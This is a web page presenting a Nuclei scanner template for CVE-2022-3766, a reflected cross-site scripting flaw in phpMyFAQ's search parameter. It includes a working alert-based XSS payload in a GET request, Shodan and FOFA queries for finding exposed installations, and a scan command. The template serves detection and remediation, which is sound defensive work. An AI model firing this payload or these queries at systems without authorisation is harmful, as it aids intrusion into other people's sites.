Skip to content

phpMyFAQ < 3.1.8 - Cross-Site Scripting

ID: CVE-2022-3766

Severity: medium

Author: ritikchaddha

Tags: cve,cve2022,phpmyfaq,xss

phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users’ browsers.

id: CVE-2022-3766
info:
name: phpMyFAQ < 3.1.8 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
impact: |
An attacker can Execute arbitrary JavaScript in victim's browser context
remediation: |
Upgrade phpMyFAQ to version 3.1.8 or later
reference:
- https://huntr.dev/bounties/d9666520-4ff5-43bb-aacf-50c8e5570983
- https://github.com/thorsten/phpMyFAQ/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d
- https://nvd.nist.gov/vuln/detail/CVE-2022-3766
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-3766
cwe-id: CWE-79
epss-score: 0.00066
epss-percentile: 0.27855
cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: phpmyfaq
product: phpmyfaq
shodan-query: http.html:"phpmyfaq"
fofa-query: body="phpmyfaq"
tags: cve,cve2022,phpmyfaq,xss
http:
- method: GET
path:
- "{{BaseURL}}/index.php?search=1af%22+onclick%3D'alert(document.domain)'"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "value=\"1af\" onclick='alert(document.domain)'"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100a788723eef48412154a8961df8fd1ba360ed03b541cb528c35458060a0f8b505022055bbce31eefa08cd735be86fc58ca45b826307d2e90d95ba04ddde499cefd7b4:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-3766.yaml"

View on Github